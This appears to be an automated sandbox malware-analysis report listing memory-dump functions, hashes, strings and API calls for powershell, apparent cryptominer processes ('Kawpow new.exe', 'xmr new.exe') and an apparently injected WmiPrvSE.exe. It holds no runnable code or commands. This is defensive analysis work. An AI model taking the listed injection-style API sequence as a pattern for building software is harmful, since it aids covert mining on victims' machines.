Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bc806fb1c06f116fc9abd0cb1b239bf61424b31b36120b554bc49a129dd2413
Instruction ID: d689bc1407b3ec69dd13637e9521ec8766718122a8812b879e378d56656c754c
Opcode Fuzzy Hash: 8bc806fb1c06f116fc9abd0cb1b239bf61424b31b36120b554bc49a129dd2413
Instruction Fuzzy Hash: B7E0DF352006001B8218F36EEC8092EB68EDEC8170764893DD10E9BB28DE38AC0A87B4

Function 04F9B070 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cc398a8f7771fbd5dea5e9ed232e02bc65175c31b5bcd2e5532883ad9da8c81
Instruction ID: 9274d8f16273e788067239d95d6af429522eff6364c075492bcea8eeff37ab21
Opcode Fuzzy Hash: 6cc398a8f7771fbd5dea5e9ed232e02bc65175c31b5bcd2e5532883ad9da8c81
Instruction Fuzzy Hash: 5EE0CD1674D3D11F5F1B413E74104967FF34AD715431E40FAD044CB612CC518C0743A1

Function 04F99250 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a884c1555f07fa2bec1695b0130acfc36907d17aa065d1c3eb90fa244eefe41
Instruction ID: 118d1b2b4cb17edd6b85455c7e2e3004f1349a83abca6cf46bcb015c358c96c4
Opcode Fuzzy Hash: 7a884c1555f07fa2bec1695b0130acfc36907d17aa065d1c3eb90fa244eefe41
Instruction Fuzzy Hash: 50F06D749003044BD764DFB8D49879ABBE5EB44350F00442DD20EC7380DB396881CB90

Function 04F98A58 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cd16b0b82b3548699ebce3c562deba5ec998ae5e54800d0b39609e9325a21eb
Instruction ID: 03362ca38e4e456e2f8cd2c197ca80dd016172b2887f5d3c9552a615dc8e0de6
Opcode Fuzzy Hash: 9cd16b0b82b3548699ebce3c562deba5ec998ae5e54800d0b39609e9325a21eb
Instruction Fuzzy Hash: 8AE0263930821147DB083778A40C3AEBA96EBC4B24F00002ED60A8334ADF385C1383E9

Function 04F98A53 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b4477010e822123780b0f4c206db4e3b83cf6665183ce6725779e9f15875b09
Instruction ID: 2359c72bfca46a65a95884557f31921cba4ca8f3150e37972215ec3c6df50ebb
Opcode Fuzzy Hash: 6b4477010e822123780b0f4c206db4e3b83cf6665183ce6725779e9f15875b09
Instruction Fuzzy Hash: 49E0D83570811287EB097734A40C3ADBA92EFC4725F00011EE61683345CF35081387D5

Function 04F99638 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abda238d1a37c6f5f06ecdb1f9171833187dca9e92d94f316226066488edd23a
Instruction ID: 793680542745dc66ac08260c8d5d121401ff08e731750dc4445ce06a6ef06b0f
Opcode Fuzzy Hash: abda238d1a37c6f5f06ecdb1f9171833187dca9e92d94f316226066488edd23a
Instruction Fuzzy Hash: 47D06722B2112557BA5475BA5810ABAB1CE8AD64A970A013B9A29D7781ED85AC0343F1

Function 04F9DF70 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: 7e8262a95a1dbe478f5370ca9ecd97f28f91e31416a0ed761fa55837b3789139
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: F1E08632B00014A79F08D599D4114D9F7A5DBCC220F04847AD90AA7790DA326D1686A1

Function 04F9DF20 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cdc53f04632ff2b43544e5f8c98a30a5bad5ed05128af6507761e9c8b708449
Instruction ID: 18a323481bc6df27fd2df1c27e4d05355d4fd5ee33e00c0af503f82a953de80f
Opcode Fuzzy Hash: 1cdc53f04632ff2b43544e5f8c98a30a5bad5ed05128af6507761e9c8b708449
Instruction Fuzzy Hash: 83E0C236710B14478615AA1EA80085FB7EEDFC96B5320412EE01ACB344DE68EC0787E5

Function 04F9CA70 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d04efe480fa197d6ab3c43cbc27ffad44b23d927259d38765bb0d0ac429217e
Instruction ID: 0b1f51c4a6f6f00176f577c1ae96440c0d1d4630218d82e71245b422d21164d6
Opcode Fuzzy Hash: 2d04efe480fa197d6ab3c43cbc27ffad44b23d927259d38765bb0d0ac429217e
Instruction Fuzzy Hash: F6E07D363081901F8310673CA804468FFF1EBDA26130801BFE049C3B82C9144C2287D5

Function 04F988E0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ea53241cd343df919f11f9ae4a7ea72576c2f9d7c6ad6af430fd8ad99d3a502
Instruction ID: 916da39e0b6ae5cd103615d5cf2a0c8a295a46c0464f1c2e45a7a362f888548f
Opcode Fuzzy Hash: 5ea53241cd343df919f11f9ae4a7ea72576c2f9d7c6ad6af430fd8ad99d3a502
Instruction Fuzzy Hash: C1E0D8309092899FCF14EB78D00546EBFF0FB06214F10429DD94686A02D6700892DF82

Function 04F98819 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7e85ac142edd0b764949d0ed4ef866d5b32c5f4de5ed32691d025a372f79581
Instruction ID: d9b68414cd23d10365cac9231884b3863fa031217e531a46e8f90ebd2bd5bb5a
Opcode Fuzzy Hash: a7e85ac142edd0b764949d0ed4ef866d5b32c5f4de5ed32691d025a372f79581
Instruction Fuzzy Hash: FEE08631A1504ACBDF09BB74D95A5EDBF30FB15301F4005DDD55352891DA71199BCB81

Function 04F9F6E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a2733f04ba6c67ed6dc6cd49e1dae8b25eb2d6845592fd36c50a252db2fc17b
Instruction ID: b3a2deca0d1b887c2b6c5f624f9d0cbae081f65a48a3cbabda5be5e6bce7febd
Opcode Fuzzy Hash: 9a2733f04ba6c67ed6dc6cd49e1dae8b25eb2d6845592fd36c50a252db2fc17b
Instruction Fuzzy Hash: 5FE04F71E012469F8B80DFACC54455DFFF0EB48200F1084EED908E7311E6319A129B81

Function 04F9CA80 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ac6e44fe6eaac973afdc2d791c35adc367844667415cf4af0ccb29b0fbddea7
Instruction ID: 958fe990beede2e3bd789ecafa3a92d8a2d731bc4be40bdb4fe8d80c45fa765f
Opcode Fuzzy Hash: 4ac6e44fe6eaac973afdc2d791c35adc367844667415cf4af0ccb29b0fbddea7
Instruction Fuzzy Hash: 74D0A73A3001105B4204776DF404559B7D9D7C9972300003EE60DC3744DE219C1287E4

Function 04F9F6F0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: ef1b9cfd24536e02f6ecd7f0fc7d93e5377ff5b3f2ce137bd247c15c8bd9ef96
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: A7D06275D042099F8B80DFADC94156DFBF4EB48200F5085AA8919D7301F7315A129BD1

Function 04F988F0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccae82b9a653dbbc86b0e322dcf51be18382e3955742d3dc198b66b622ad9cf5
Instruction ID: 0fc26c5548b2525284bc2d728adb7d60321a8709aa5ed2657e54fd545aea1a57
Opcode Fuzzy Hash: ccae82b9a653dbbc86b0e322dcf51be18382e3955742d3dc198b66b622ad9cf5
Instruction Fuzzy Hash: B4D01731A0820A8B8B08EFA8E45696EBBF5EB45200F004169DA0A93795EA306C52CBC1

Function 04F98828 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 883135dd36df111b2e6eda8a633d71225cad5da70766c52b8a9ba2ae64c46bb8
Instruction ID: d7426c8efd7046278c55b294760a877b3a1a88e8feb5344c9d6db5b734ef68ed
Opcode Fuzzy Hash: 883135dd36df111b2e6eda8a633d71225cad5da70766c52b8a9ba2ae64c46bb8
Instruction Fuzzy Hash: DDD067319051098BCB09ABB4E85A5BEBB74FB14301F4041ADD917525D5EA316A6BCAC1

Function 04F97A00 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 458625ea3d41b1d64a898b52dfa03bbb8533c79db8c1afce9f8a45c3902b243c
Instruction ID: 6cce814fc30f66e55ae3cd72b21c1f912916137868d29a9c3c2e89de3c8795e5
Opcode Fuzzy Hash: 458625ea3d41b1d64a898b52dfa03bbb8533c79db8c1afce9f8a45c3902b243c
Instruction Fuzzy Hash: 1AC012340457898F93176B7A94004247B5CAA426163490894E4090B2639A26A951CE51

Function 04F97F71 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85f32b6cca76810f1d35868a1f7cf90fdd8f09bc8bccfc109dd95e9a18179a8c
Instruction ID: 6b17810a8360d973e7dcd779bd96a0cf3dad91a5e7804ad389a7498d365c488f
Opcode Fuzzy Hash: 85f32b6cca76810f1d35868a1f7cf90fdd8f09bc8bccfc109dd95e9a18179a8c
Instruction Fuzzy Hash: 6EC08C2250C3C40FEF0BDB308A500663F315A4314034B80EB80C1CB0A3C92A0C0FCB12

Function 04F97A08 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e1d07601a4d1ea052468796de8d4f110c7bc07a45c6c95048bdd0d7c020ae98
Instruction ID: 6a3145c8722f36749589bbc00078c26cefe12f704507357d93bf0b62515c29a7
Opcode Fuzzy Hash: 8e1d07601a4d1ea052468796de8d4f110c7bc07a45c6c95048bdd0d7c020ae98
Instruction Fuzzy Hash: 9FB092300847098FC2096F76A404829B32DBB4120A78408A8E40A0B2A78E37E850CA44

Non-executed Functions

Function 07E510A5 Relevance: 20.3, Strings: 16, Instructions: 293COMMON

Download Yara Rule

Strings

$jq, xrefs: 07E51301
tPjq, xrefs: 07E511FB
84<l, xrefs: 07E5119C
$jq, xrefs: 07E5131B
foq, xrefs: 07E5116A
$jq, xrefs: 07E51149
`Qjq, xrefs: 07E5125B
84<l, xrefs: 07E511A6
`Qjq, xrefs: 07E511B5
tPjq, xrefs: 07E511EF
$jq, xrefs: 07E5132B
`Qjq, xrefs: 07E5121B
`Qjq, xrefs: 07E51227
$jq, xrefs: 07E5112D
$jq, xrefs: 07E5110C
$jq, xrefs: 07E512F1

Memory Dump Source

Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd

Similarity

API ID:
String ID: foq$84<l$84<l$`Qjq$`Qjq$`Qjq$`Qjq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
API String ID: 0-2508906846
Opcode ID: 26d3592a53582bf80f7f7f9701c0395d193b0be3b1337fe4dce02a3153fc94fa
Instruction ID: 9713c8a1e370e7337aa67fdfcc86fb1bbfea1a129cb73a574a09498a8be3f33f
Opcode Fuzzy Hash: 26d3592a53582bf80f7f7f9701c0395d193b0be3b1337fe4dce02a3153fc94fa
Instruction Fuzzy Hash: BEB101B574220ECFCB24DE68C950BAB7BE6EF85305F149465EC019B290CB35DC91CBA1

Function 07E53928 Relevance: 12.8, Strings: 10, Instructions: 323COMMON

Download Yara Rule

Strings

4l, xrefs: 07E53A0F
$jq, xrefs: 07E5396C
4l, xrefs: 07E53A1D
4'jq, xrefs: 07E53B29
4'jq, xrefs: 07E53B35
$jq, xrefs: 07E53C0E
$jq, xrefs: 07E5393A
tPjq, xrefs: 07E539A5
$jq, xrefs: 07E53960
tPjq, xrefs: 07E539B1

Memory Dump Source

Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$4l$4l
API String ID: 0-937335165
Opcode ID: 45fe00e28c4df82917e46837eb80e70a7498c2505cdfcfde4f94778cdbe13dcc
Instruction ID: f21601015c897ac57ca4818590b9b90684cf24dcdb8d21228ea1e574a9e65290
Opcode Fuzzy Hash: 45fe00e28c4df82917e46837eb80e70a7498c2505cdfcfde4f94778cdbe13dcc
Instruction Fuzzy Hash: FFA17CB67063198FC7119A69C8107A7BBE6EFC6298F14846BDD05CB392CA35CC85C7A1

Function 07E53678 Relevance: 8.9, Strings: 7, Instructions: 186COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07E53722
4l, xrefs: 07E5386D
$jq, xrefs: 07E53836
4'jq, xrefs: 07E5372E
4l, xrefs: 07E5387B
$jq, xrefs: 07E5382A
$jq, xrefs: 07E537FF

Memory Dump Source

Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq$$jq$4l$4l
API String ID: 0-1950125027
Opcode ID: 9625b35dbd4a0399dc6462d064e6ea82eff1578f626489f94325a0b92331be69
Instruction ID: af07db4c5cf1dced695c97f7d40fb47c4aca733f26428fb38a7526be717d5b0e
Opcode Fuzzy Hash: 9625b35dbd4a0399dc6462d064e6ea82eff1578f626489f94325a0b92331be69
Instruction Fuzzy Hash: F9516EF5B0630E9FCB254A698410367BBA6EFC629DF24806FDD05CB291DB35C885C761

Function 04F97AE8 Relevance: 6.5, Strings: 5, Instructions: 237COMMON

Download Yara Rule

Strings

tM>l, xrefs: 04F97B9C
`kq, xrefs: 04F97D0C
`kq, xrefs: 04F97D8A
`kq, xrefs: 04F97C6A
`kq, xrefs: 04F97BEB

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID: tM>l$`kq$`kq$`kq$`kq
API String ID: 0-238216489
Opcode ID: 8bb9862e8f4ae43235708150b0b7956ccf561dc1f81289bb652241338164e2fa
Instruction ID: b51227659139c2ff3075075481a2f0aecf529ed18e8fe6f2ec7ec31020e1af56
Opcode Fuzzy Hash: 8bb9862e8f4ae43235708150b0b7956ccf561dc1f81289bb652241338164e2fa
Instruction Fuzzy Hash: C7B17274E003099FDB54DFA9D580A9EBBF5FF48300F20862AD419AB355EB34A905CF90

Function 04F97AF8 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

tM>l, xrefs: 04F97B9C
`kq, xrefs: 04F97D0C
`kq, xrefs: 04F97D8A
`kq, xrefs: 04F97C6A
`kq, xrefs: 04F97BEB

Memory Dump Source

Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd

Similarity

API ID:
String ID: tM>l$`kq$`kq$`kq$`kq
API String ID: 0-238216489
Opcode ID: 1a51c7bd3571a05e63cfa0dbb740c0a0fa3fafd479ade1d6b3790c795f3c6eee
Instruction ID: f469c80fbb0f2fc90e2a1dc97f3f1354089addaa38834b2d9c5471d18ed3eb33
Opcode Fuzzy Hash: 1a51c7bd3571a05e63cfa0dbb740c0a0fa3fafd479ade1d6b3790c795f3c6eee
Instruction Fuzzy Hash: 5CB15274E002099FDB54DFA9D580A9EFBF6FF48300F20862AD419AB355E734A945CF90

Function 07E55798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$jq, xrefs: 07E557C6
$jq, xrefs: 07E557F4
$jq, xrefs: 07E55800
$jq, xrefs: 07E557AA

Memory Dump Source

Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd

Similarity

API ID:
String ID: $jq$$jq$$jq$$jq
API String ID: 0-2428501249
Opcode ID: a1d6d574ea1159ec09f8e18fc97777b7fefd5e716f22d37a810bdd0785f8f659
Instruction ID: 4148f050284fbaa35927f59e2da98a2e9c5449a3c7e9833a98ec22bcdc1c757e
Opcode Fuzzy Hash: a1d6d574ea1159ec09f8e18fc97777b7fefd5e716f22d37a810bdd0785f8f659
Instruction Fuzzy Hash: C02132B231231A9BDB24596A884076BBBDBABC1715F24843AED058B291DD36C8918361

Function 07E51FAF Relevance: 5.0, Strings: 4, Instructions: 46COMMON

Download Yara Rule

Strings

J?l, xrefs: 07E52017
tPjq, xrefs: 07E51FEB
J?l, xrefs: 07E5200B
tPjq, xrefs: 07E51FDF

Memory Dump Source

Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd

Similarity

API ID:
String ID: tPjq$tPjq$J?l$J?l
API String ID: 0-3664001540
Opcode ID: 3259e05993622f0e5906e52ae1fe156fb78dd918d6a574fe691d7231a49edbcb
Instruction ID: 28c5f71f4635b60135d510d679d8e1bd3ccce8e71ff72c8bf0c113f312e5bf4f
Opcode Fuzzy Hash: 3259e05993622f0e5906e52ae1fe156fb78dd918d6a574fe691d7231a49edbcb
Instruction Fuzzy Hash: 8A0147B1B4220D4FDB20465498107A7FB69EF86308F144153CF008F282CB368C52C3B1

Function 07E50309 Relevance: 5.0, Strings: 4, Instructions: 45COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07E50373
$jq, xrefs: 07E5035E
4'jq, xrefs: 07E5037F
$jq, xrefs: 07E50352

Memory Dump Source

Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq
API String ID: 0-1496060811
Opcode ID: 762e0d8a68433b59f474a8c2ed1a3bbfa5480b5aace9fb13667f0a669596b080
Instruction ID: 5f0cffeb4efb903ac1dd690dda0eb28ad1ca5bace26d47e1a0cd231d7e3b5391
Opcode Fuzzy Hash: 762e0d8a68433b59f474a8c2ed1a3bbfa5480b5aace9fb13667f0a669596b080
Instruction Fuzzy Hash: C001F9A178F7594FC32B123858201A6AFB76F8365072941DBDC41DF3E2CD194D0687AB

Analysis Process: Kawpow new.exePID: 7244, Parent PID: 1020COMMON

Executed Functions

Function 00007FF6CDC41140 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2232768142.00007FF6CDC41000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF6CDC40000, based on PE: true

Associated: 00000009.00000002.2232692595.00007FF6CDC40000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2232993961.00007FF6CDC4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2233823594.00007FF6CDC4F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2234486712.00007FF6CDC50000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2237327335.00007FF6CE144000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2237421637.00007FF6CE17C000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cdc40000_Kawpow new.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
Instruction ID: 63698d662ad47af922e19bdd0c1de9e70d2bbb38baff523db93e89d32ac5b0ce
Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
Instruction Fuzzy Hash: D1B01231F0430985E3002F01D84137832746B08742F400031C69C43362DE7D54424B10

Analysis Process: xmr new.exePID: 7376, Parent PID: 1020COMMON

Executed Functions

Function 00007FF7B6151140 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2235861108.00007FF7B6151000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7B6150000, based on PE: true

Associated: 0000000C.00000002.2235707034.00007FF7B6150000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2236068311.00007FF7B615C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2236145532.00007FF7B615F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2236232364.00007FF7B6160000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2237814066.00007FF7B6654000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2237891781.00007FF7B668C000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff7b6150000_xmr new.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
Instruction ID: 54eca9e30dffe8e5fbbd2e0a297d97d4cd5d8b4e0cc59a6ff874bb3074f9a7b5
Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
Instruction Fuzzy Hash: 94B0927490420D84E2013F2DEC8225AA2606B2A740F8004A1C70C0235ACA6D50408B20

Analysis Process: WmiPrvSE.exePID: 7564, Parent PID: 752COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	81
Total number of Limit Nodes:	2

Executed Functions

Function 000001F43C54328C Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001F43C5432AE
PathFindFileNameW.SHLWAPI ref: 000001F43C5432BD

Part of subcall function 000001F43C543844: StrCmpNIW.SHLWAPI ref: 000001F43C54385C

Part of subcall function 000001F43C543790: GetModuleHandleW.KERNEL32 ref: 000001F43C54379E
Part of subcall function 000001F43C543790: GetCurrentProcess.KERNEL32 ref: 000001F43C5437CC
Part of subcall function 000001F43C543790: VirtualProtectEx.KERNEL32 ref: 000001F43C5437EE
Part of subcall function 000001F43C543790: GetCurrentProcess.KERNEL32 ref: 000001F43C543809
Part of subcall function 000001F43C543790: VirtualProtectEx.KERNEL32 ref: 000001F43C54382A

CreateThread.KERNEL32 ref: 000001F43C54330B

Part of subcall function 000001F43C541D14: GetCurrentThread.KERNEL32 ref: 000001F43C541D1F

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction ID: 7a4a34fefe5390c54e7c96e7146e16403cbd3c8078c9fd79adf500ccc1197042
Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction Fuzzy Hash: 3D115B71610E7383FB649B23F9093FB22E5BB64785FA05134AB46816B1EF7CC154C608

Function 000001F43C541ABC Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001F43C541628: GetProcessHeap.KERNEL32 ref: 000001F43C541633
Part of subcall function 000001F43C541628: HeapAlloc.KERNEL32 ref: 000001F43C541642
Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C5416B2
Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C5416DF
Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C5416F9
